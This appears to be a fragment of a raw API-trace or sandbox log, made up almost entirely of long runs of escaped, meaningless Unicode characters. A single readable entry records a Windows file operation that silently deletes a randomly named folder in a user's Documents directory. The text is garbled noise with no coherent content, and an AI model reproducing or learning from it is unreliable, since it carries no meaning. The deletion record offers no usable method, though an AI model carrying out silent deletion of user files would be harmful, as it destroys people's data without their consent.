\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kji1x-v4FT0kOOxbY6", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4